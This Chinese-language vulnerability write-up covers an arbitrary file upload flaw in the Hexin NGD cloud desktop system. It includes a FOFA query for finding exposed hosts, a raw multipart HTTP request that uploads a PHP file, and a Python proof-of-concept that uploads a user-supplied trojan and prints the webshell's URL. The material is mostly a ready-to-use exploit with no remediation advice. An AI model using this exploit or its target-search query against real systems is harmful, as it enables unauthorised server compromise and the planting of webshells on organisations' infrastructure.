简介
和信下一代云桌面,是一款基于NGD(Next Generation Desktop)架构的桌面虚拟化产品,融合帧传输(VDI)和流传输(VOI/IDV),构建既可以利用服务器的计算资源进行集中计算,又可以利用终端本身的资源进行分布计算的“前后端混合计算”模式,从而有效解决客户终端在集中管理、高效运维和安全可用等难题。
漏洞
和信创天云桌面系统存在命令执行_任意文件上传,可上传恶意文件获取服务器权限
FOFA
title="和信下一代云桌面VENGD"
复现
payload:
POST /Upload/upload_file.php?l=test HTTP/1.1 Host: X.X.X.X Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv ------WebKitFormBoundaryfcKRltGv Content-Disposition: form-data; name="file"; filename="1.php" Content-Type: image/avif <?php phpinfo(); ?> ------WebKitFormBoundaryfcKRltGv--
成功利用
poc如下:(python版)
import requests import time import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning #消除警告 requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # 消除警告 # fofa :body="和信下一代云桌面" p=input('请输入要上传的木马文件:') i = open(p,'r+',encoding='utf-8') pp = i.read() url = 'http://xxx.xxx.xxx.xxx' url1 = url + '/Upload/upload_file.php?l=test' data = ''' ------WebKitFormBoundaryfcKRltGv Content-Disposition: form-data; name="file"; filename="l.php" Content-Type: image/avif {} ------WebKitFormBoundaryfcKRltGv-- '''.format(pp) headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0", "Content-Type": "multipart/form-data;boundary=----WebKitFormBoundaryfcKRltGv" } r = requests.get(url=url1,verify=False,timeout = 10) if r.status_code == 200 and '_Requst' in r.text: #print(r.text) t = requests.post(url = url1 ,headers=headers,data=data,verify=False,timeout = 10) #print(t.text) if t.status_code == 200 and '_Requst' in t.text: print('存在和信创天云桌面系统_命令执行_任意文件上传') print('正在上传木马文件') time.sleep(5) print('马子地址为:'+url+'/Upload/test/l.php') else: print(' {}不存在和信创天云桌面系统_命令执行_任意文件上传'.format(url)) else: print(' {}不存在和信创天云桌面系统_命令执行_任意文件上传'.format(url))
